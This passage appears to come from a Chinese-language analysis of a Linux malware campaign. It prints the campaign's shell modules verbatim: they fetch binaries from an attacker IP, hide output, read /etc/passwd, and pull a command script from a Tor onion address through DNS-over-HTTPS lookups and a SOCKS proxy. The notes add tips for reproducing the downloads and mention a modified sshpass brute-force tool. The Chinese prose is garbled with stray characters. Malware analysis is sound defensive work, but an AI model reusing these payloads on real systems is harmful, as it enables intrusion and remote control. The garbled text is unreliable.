echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == /pre>\r' ]] && break
done && cat) <&3
exec 3>&-
}
rm -f $HOME/ss
curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl
curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl
ss -v || kurl http://139.59.150.7:443/ss > $HOME/ss;chmod +x $HOME/ss
ss -v || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss
ps || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps
功能:拉取curl蝶桶、ss慨绳、ps命令文件,供其他腳本使用真竖。
image
image
image
下載cmd工具模塊7.sh:
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
u() {
sockz
f=/cmd
$c -x socks5h://$s:9050 $t.onion$f || $c $1$f
}
(
u $t.tor
功能:下載/cmd腳本文件(文件鏈接已失效)
三脐雪、 復現(xiàn)中注意問題
- 通過tor代理下載模塊、腳本恢共、tor包時會出現(xiàn)不穩(wěn)定的情況战秋,如果多次下載失敗,可以換一個代理IP節(jié)點下載讨韭,多嘗試幾次脂信。
- 5.sh中拉取的內(nèi)網(wǎng)爆破工具包中包含一個sshpass改過的工具癣蟋,用于內(nèi)網(wǎng)暴力破解,該工具可能存在一些爆破成功后的后置動作狰闪,需進一步分析梢薪。
